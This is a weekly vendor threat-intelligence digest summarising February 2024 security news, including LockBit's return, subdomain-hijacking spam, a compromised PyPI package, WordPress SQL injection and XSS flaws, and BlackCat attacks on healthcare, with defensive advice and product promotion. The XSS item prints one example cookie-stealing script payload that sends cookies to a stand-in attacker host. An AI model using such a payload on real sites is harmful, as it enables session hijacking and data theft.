Vercara’s Open-Source Intelligence (OSINT) Report – February 23 – 29, 2024

LockBit ransomware returns, restores servers after police disruption.

(TLP: CLEAR) The LockBit ransomware gang has swiftly relaunched its operations on a new infrastructure, just days after law enforcement dismantled their previous servers. In a message presented as an FBI leak, the gang acknowledged their negligence in enabling the breach and outlined their plans. The authorities had taken down 34 servers hosting the data leak website, cryptocurrency addresses, decryption keys, and an affiliate panel. LockBit confirmed the breach, attributing it to outdated PHP servers that were not promptly updated. The gang, now focusing on government targets, believes law enforcement targeted them due to a ransomware attack on Fulton County in January. LockBit plans to enhance security by decentralizing affiliate panels and manually releasing decryptors. The message appears to be damage control, aimed at restoring the gang’s credibility following the setback.

(TLP: CLEAR) Comments: It is not surprising that LockBit was able to reestablish their operations in in short amount of time after the FBI and other government agencies took down their IT infrastructure. It is assessed that LockBit already had redundant IT infrastructure in place that to which they could easily pivot their operations. This is a reminder that even though law enforcement can dismantle criminal infrastructure, that does not necessarily mean that the threat posed by that criminal organization is gone.

(TLP: CLEAR) Recommended best practices/regulations: PCI-DSS Requirement 12.6.3.1: “Security awareness training includes awareness of threats and vulnerabilities that could impact the security of the CDE, including but not limited to:

• Phishing and related attacks.
• Social engineering.”

Since most ransomware attacks start with a social engineering attack, it is highly advised that organizations have a robust and continuous cybersecurity training program that teaches their employees how to identify malicious emails and other social engineering attacks.

(TLP: CLEAR) Vercara: Vercara UltraDDR (DNS Detection and Response) filters internal DNS responses from users as well as machines using both defined categories including botnet C&C as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Sources: https://www.bleepingcomputer.com/news/security/lockbit-ransomware-returns-restores-servers-after-police-disruption/

Hijacked subdomains of major brands used in massive spam campaign.

(TLP: CLEAR) The “SubdoMailing” ad fraud campaign has emerged as a massive threat, utilizing over 8,000 legitimate internet domains and 13,000 subdomains to send up to five million emails per day. The campaign involves the hijacking of abandoned subdomains and domains belonging to well-known companies, such as MSN, VMware, McAfee, and others. Exploiting the legitimacy of these domains allows the fraudulent emails to bypass spam filters. Clicking on embedded buttons in the emails leads users through a series of redirections, generating revenue for threat actors via fraudulent ad views. The campaign has been active since 2022 and employs various tactics, including CNAME hijacking and SPF record exploitation. Guardio Labs attributes the campaign to a threat actor named “ResurrecAds,” utilizing nearly 22,000 unique IPs and operating through a vast network of domains and subdomains. Guardio Labs has created a SubdoMailing checker site to help domain owners detect abuse and take preventive measures.

(TLP: CLEAR) Comments: The “SubdoMailing” ad fraud campaign highlights the importance of maintaining constant vigilance and implementing a proactive strategy to safeguard legitimate internet infrastructure from malicious exploitation. To effectively counteract such threats, it is essential for organizations to regularly monitor their domain and subdomain usage, employ robust cybersecurity measures, and educate their employees about the risks of phishing and other fraudulent activities.

(TLP: CLEAR) Recommended best practices/regulations:

FIRST DNS Abuses Techniques Matrix Item 19: “Spoofing of a registered domain – In a context where a domain name is expected (such as the From header in mail or a URL in a web page or message body), supplying a domain name not controlled by the attacker and that is in fact controlled by or registered to a legitimate registrant.”

PCI-DSS 8.3.4: “All user access to system components for users and administrators is authenticated via at least one of the following authentication factors:

• Something you know, such as a password or passphrase.
• Something you have, such as a token device or smart card.
• Something you are, such as a biometric element.”
  For administrative access to DNS zones, it is recommended to:
• Use Two Factor Authentication on DNS management web portal as well as at the registrar
• Employ registrar locks when available.
  Keep track of all contact and recovery emails to make sure they are company controlled, not personal emails.
• Review existing accounts with registrars and others.
  Ensure that you have notifications in place about expiry dates.
• Keep DMARC, DKIM, and SPF records up to date based on current domain registrations.
• Monitor the issuance of any new SSL Certificates for your domains.
• Enabling DNSSEC on your zone could provide an early indication of compromise.

(TLP: CLEAR) Vercara: Vercara UltraDNS solutions include 2 separate diverse authoritative resolution platforms for an aggregate 47 nodes. UltraDNS provides resiliency, performance, and advanced features such as load-balancing, monitored failover, automated DNSSEC signing and geographic resolution.

Sources: https://www.bleepingcomputer.com/news/security/hijacked-subdomains-of-major-brands-used-in-massive-spam-campaign/

Huge surge in attacks exploiting user credentials to hack enterprises.

(TLP: CLEAR) Recent reporting has highlighted the vast amount of compromised credentials on the Dark Web and the significant threat they pose, making it easier for criminals to exploit legitimate accounts. Info-stealing malware, aimed at obtaining personally identifiable information, is expected to increase by 266% in 2024. Major attacks using legitimate accounts require more sophisticated response procedures from security teams, approximately 200% more than the average incident. Identity-based threats are on the rise, with cybercriminals increasingly using generative AI to enhance their attacks. Critical infrastructure organizations are particularly targeted, accounting for about 70% of attacks. Phishing emails, exploitation of public-facing applications, and the use of legitimate accounts contribute to over 85% of attacks. The report emphasizes that network compromise could have been avoided in around 85% of attacks through basic security measures like patching, multi-factor authentication, and least-privilege principles. Additionally, identity exploitation is a growing concern, with 50% of cyberattacks in the UK starting with legitimate accounts as the attack vector. The report urges organizations to adopt contemporary security practices to mitigate risks and strengthen defenses against evolving cyber threats.

(TLP: CLEAR) Comments: The following reporting emphasizes that basic security measures, such as patching, multi-factor authentication, and least-privilege principles, could prevent approximately 85% of network compromises. As identity exploitation becomes an increased concern, with 50% of cyberattacks in the UK originating from legitimate accounts, organizations must prioritize strengthening their defenses against the evolving cyber threat landscape.

(TLP: CLEAR) Recommended best practices/regulations: Organizations should have a rigorous password policy that should be in line with the National Institute of Standards and Technology (NIST) Digital Identity Guidelines (SP 800-63B). NIST SP 800-63B outlines requirements for length and complexity that should be implemented. Additionally, the password policy should have a set period for when passwords need to be changed as well as a review all user accounts on a periodic basis to ensure accounts are still valid and delete any accounts that are no longer needed (Ie: accounts of personnel that left the organization).

(TLP: CLEAR) Vercara: Vercara UltraDDR (DNS Detection and Response) filters internal DNS responses from users as well as machines using both defined categories including botnet C&C as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Sources: https://cybersecuritynews.com/user-credentials-hack-enterprises/

Sources: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf

Dormant PyPI package compromised to spread Nova Sentinel Malware.

(TLP: CLEAR) A dormant Python package named django-log-tracker, available on the Python Package Index (PyPI), was recently updated after almost two years to deliver the Nova Sentinel information-stealing malware. Phylum, a software supply chain security firm, detected the anomalous update on February 21, 2024. The package, last updated on GitHub in April 2022, suggests a compromise of the PyPI account belonging to the developer. The malicious update stripped the package of most of its original content, leaving only essential files behind. The update included code fetching and executing an executable named “Updater_1.4.4_x64.exe” from a remote server, embedding the Nova Sentinel malware. This incident underscores the risk of supply-chain attacks via compromised PyPI accounts. The affected package has been removed from PyPI.

(TLP: CLEAR) Comments: Malicious actors look to inject malicious code into popular code repositories to gain access to networks that they could not normally have access to.

(TLP: CLEAR) Recommended best practices/regulations: Executive Order 14028: “The security and integrity of “critical software” — software that performs functions critical to trust (such as affording or requiring elevated system privileges or direct access to networking and computing resources) — is a particular concern. Accordingly, the Federal Government must take action to rapidly improve the security and integrity of the software supply chain, with a priority on addressing critical software.”

Injection attacks are the most common type of application attack due to lack of a DevSecOps environment, 3rd party application development and overall lack of comprehensive input validation. It is advised that organizations establish sandbox testing to ensure there are no potential security concerns before putting it on production systems. Organizations should also conduct a static code review to validate all third-party code used to verify the third-party code does not interject security concerns.

(TLP: CLEAR) Vercara: Vercara UltraDDR (DNS Detection and Response) filters internal DNS responses from users as well as machines using both defined categories including botnet C&C as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Sources: https://thehackernews.com/2024/02/dormant-pypi-package-compromised-to.html

WordPress plugin alert – critical SQLi vulnerability threatens 200K+ websites.

(TLP: CLEAR) A critical security vulnerability has been identified in the WordPress plugin “Ultimate Member,” with over 200,000 active installations. Tracked as CVE-2024-1071, the flaw allows unauthenticated attackers to conduct SQL injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2. The issue arises due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query. The vulnerability only affects users who have enabled the “Enable custom table for usermeta” option in the plugin settings. A fix for the flaw has been released in version 2.8.3, and users are advised to update the plugin promptly to mitigate potential threats. The disclosure comes amid a rise in a campaign using compromised WordPress sites to inject crypto drainers and exploit the Web3 ecosystem. Additionally, a new drainer-as-a-service (DaaS) scheme called CG has been discovered, running a large affiliate program with Telegram bots facilitating fraudulent operations.

(TLP: CLEAR) Comments: The Ultimate Member plug in allows individuals to self-register themselves on a website with the objective of creating an advanced online community. This plugin includes front-end user profiles; front-end user registration; front-end user login; custom form fields; user account page; custom user roles; member directories and so much more. SQL injections attempt to gain access to underlying databases to steal sensitive information.

(TLP: CLEAR) Recommended best practices/regulations: OWASP Top 10 A03: “An application is vulnerable to attack when:

• User-supplied data is not validated, filtered, or sanitized by the application.
• Dynamic queries or non-parameterized calls without context-aware escaping are used directly in the interpreter.
• Hostile data is used within object-relational mapping (ORM) search parameters to extract additional, sensitive records.
• Hostile data is directly used or concatenated. The SQL or command contains the structure and malicious data in dynamic queries, commands, or stored procedures.”

It is advised that the organization security policy includes routine reviews of all IT infrastructure including applications to ensure they are up to date with the latest security patches. If no security patches are being released for known vulnerabilities, organizations should look at either replacing the outdated systems or establishing extra security-in-depth measures to protect non-updated systems.

(TLP: CLEAR) Vercara: Vercara UltraWAF helps prevent common exploits of vulnerabilities in web applications that could lead to insertion of malware. Signatures for new vulnerabilities are constantly updated along with granular input validation controls and traffic filtering measures for flexibility.  UltraWAF includes a number of tools for managing both benign and malicious bots including bot signatures and device fingerprinting. UltraWAF can also prevent some layer 7 DDoS attacks.

Sources: https://thehackernews.com/2024/02/wordpress-plugin-alert-critical-sqli.html

Source: https://wordpress.org/plugins/ultimate-member/

XSS flaw in LiteSpeed cache plugin exposes millions of WordPress sites at risk.

(TLP: CLEAR) Patchstack researchers have identified a critical unauthenticated site-wide stored XSS vulnerability, tracked as CVE-2023-40000, in the LiteSpeed Cache plugin for WordPress. The plugin, with over 4 million active installations, allows an unauthenticated user to exploit the flaw through a single HTTP request, potentially stealing sensitive information or escalating privileges on the WordPress site. The vulnerability, residing in the ‘update_cdn_status’ function, results from the lack of input sanitization and output escaping. The issue has been addressed in version 5.7.0.1, released in October 2023, which includes proper permission checks and hash validation to restrict access to privileged users. Users are advised to update to the latest version to mitigate the risk.

(TLP: CLEAR) Comments: Cross-Site Scripting (XSS) is a web application attack in which malicious actors inject malicious executable scripts into the code of a trusted application or website. This example XSS payload would allow a malicous actor to steal a user’s cookie which could be used to hijack a user’s session or steal sensitive information (<script>new Image().src=”https://attacker[.]com/cookie.php?cookie=”+document.cookie</script>). A vulnerable section of a website that is commonly used to inject these types of payloads are the comments, blog or sections and once injected will automatically execute whenever a user visits that site, and the user will unaware of the attack.

(TLP: CLEAR) Recommended best practices/regulations: Common Weaknesses and Exposures 79: “Assume all input is malicious. Use an “accept known good” input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications or transform it into something that does.”

It is advised that the organization security policy includes routine reviews of all IT infrastructure including applications to ensure they are up to date with the latest security patches. If no security patches are being released for known vulnerabilities, organizations should look at either replacing the outdated systems or establishing extra security-in-depth measures to protect non-updated systems.

(TLP: CLEAR) Vercara: Vercara UltraWAF helps prevent common exploits of vulnerabilities in web applications that could lead to insertion of malware. Signatures for new vulnerabilities are constantly updated along with granular input validation controls and traffic filtering measures for flexibility.  UltraWAF includes a number of tools for managing both benign and malicious bots including bot signatures and device fingerprinting. UltraWAF can also prevent some layer 7 DDoS attacks.

Sources: https://securityaffairs.com/159667/hacking/litespeed-cache-plugin-xss.html

Savvy Seahorse gang uses DNS CNAME records to power investor scams.

(TLP: CLEAR) A threat actor named Savvy Seahorse has been utilizing CNAME DNS records to create a Traffic Distribution System (TDS) for financial scam campaigns. The actor registers multiple subdomains for attack waves that share a common CNAME record, allowing rotation to new destinations to evade detection without altering the attack domain’s DNS settings. This technique, named ‘CNAME TDS,’ is the first publicly reported case of abusing DNS CNAMEs for TDS. Savvy Seahorse has been active since at least August 2021, conducting short attack waves lasting between five and ten days. The threat actor targets victims through Facebook ads, directing them to fake investment platforms where they are tricked into depositing funds and providing sensitive personal data. The campaigns involve chatbots that interact with victims to convince them of high investment returns, automating the scamming process. Savvy Seahorse spreads its infrastructure across multiple registrars and hosting providers to evade attribution and achieve operational resilience. The actor uses domain generation algorithms (DGAs) to create and manage thousands of domains for the CNAME TDS system, employing wildcard DNS responses to change the status of domains and make tracking and mapping infrastructure more difficult. The scams are promoted in multiple languages, indicating a global targeting scope. The malicious subdomains host registration forms designed to steal victims’ personal information, redirecting approved users to fake trading platforms where they can deposit funds using various payment methods.

(TLP: CLEAR) Comments: Much like how websites use a Content Delivery Network to deliver web content at scale when the Internet has moments of instability and outages, a Traffic Distribution System allows threat actors the ability to evade blocking using several adversarial engineering techniques that assume that a percentage of their malware infrastructure will be unavailable due to enterprise security controls or even law enforcement takedowns.

(TLP: CLEAR) Recommended best practices/regulations: FIRST DNS Abuse Matrix 15: “Malicious registration of selective second level domains – For example, before attacking a victim, adversaries purchase or register domains from an ICANN-accredited registrar that can be used during targeting.”  The resiliency of Traffic Distribution Systems implies a more robust set of blocking mechanisms such as proactive blocking with a Protective DNS solution.

(TLP: CLEAR) Vercara: To mitigate the impact of already-manipulated DNS records, Vercara UltraDDR (DNS Detection and Response) filters internal DNS responses from users as well as machines using both defined categories including botnet C&C as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Sources: https://www.bleepingcomputer.com/news/security/savvy-seahorse-gang-uses-dns-cname-records-to-power-investor-scams/

FBI warns U.S. healthcare sector of targeted BlackCat ransomware attacks.

(TLP: CLEAR) The U.S. government has issued a warning about the resurgence of BlackCat (aka ALPHV) ransomware attacks targeting the healthcare sector. Since mid-December 2023, the healthcare sector has been the most victimized, with nearly 70 leaked victims. This resurgence is believed to be in response to a post by the ALPHV/BlackCat administrator, encouraging affiliates to target hospitals after operational action against the group in early December 2023. Despite a coordinated law enforcement operation last year that temporarily disrupted BlackCat, the group managed to regain control of its dark leak sites and continues to operate with a new TOR data leak portal. Recent attacks by BlackCat have targeted critical infrastructure organizations, including Prudential Financial, LoanDepot, Trans-Northern Pipelines, and UnitedHealth Group subsidiary Optum. In response to the escalating threat, the U.S. government is offering financial rewards of up to $15 million for information leading to the identification of key members and affiliates of the BlackCat ransomware group. The article also highlights the concurrent return of LockBit and the exploitation of critical security flaws in ConnectWise’s ScreenConnect remote desktop and access software by threat actors, including the BlackCat group. The use of remote access software like ScreenConnect remains a prime target for threat actors, as evidenced by the mass exploitation of vulnerabilities. Additionally, the article mentions other ransomware groups such as RansomHouse, Rhysida, and a Phobos variant called Backmydata compromising organizations worldwide. Some groups are adopting more sophisticated tactics, such as RansomHouse using a custom tool named MrAgent to automate and track the deployment of ransomware across large environments with a high number of hypervisor systems. Furthermore, there is a trend among ransomware groups to sell direct network access as a new monetization method. The article concludes by mentioning the release of a Linux-specific ransomware threat known as Kryptina, which surfaced in December 2023, posing a potential risk for increased ransomware attacks against Linux systems. It is important for organizations, especially in the healthcare sector, to be vigilant and implement robust cybersecurity measures to protect against the evolving tactics of ransomware groups like BlackCat.

(TLP: CLEAR) Comments: BlackCat/ALPHV is sophisticated ransomware group that first emerged in November 2021 and operates as a Ransomware-as-a-Service (RaaS). BlackCat’s is known to conduct triple extortion against their victims (encryption, data leak, and DDoS attacks). This group continuously updates their Tactics, Techniques and Procedures (TTPs) to evade detection and bypass security control measures. In early 2023, the US Justice Department announced a campaign to disrupt BlackCat’s operations, but BlackCat can adjust their IT infrastructure to mitigate any loss by this campaign.

(TLP: CLEAR) Recommended best practices/regulations: The Health Insurance Portability and Accountability (HIPPA) Act outlines security requirements for all healthcare providers. These requirements include administrative safeguards, Physical safeguards and technical safeguards that must be adhered to. Also, organizations should conduct network assessments regularly to ensure only mission critical ports and protocols are open and close those not needed.

(TLP: CLEAR) Vercara: Vercara UltraDDR (DNS Detection and Response) filters internal DNS responses from users as well as machines using both defined categories including botnet C&C as well as machine learning to detect previously uncategorized malicious associations and help prevent data exfiltration or malware detonation.

Sources: https://thehackernews.com/2024/02/fbi-warns-us-healthcare-sector-of.html

Source: https://www.bleepingcomputer.com/news/security/fbi-cisa-warn-us-hospitals-of-targeted-blackcat-ransomware-attacks/

Source: https://www.hhs.gov/hipaa/for-professionals/security/laws-regulations/index.html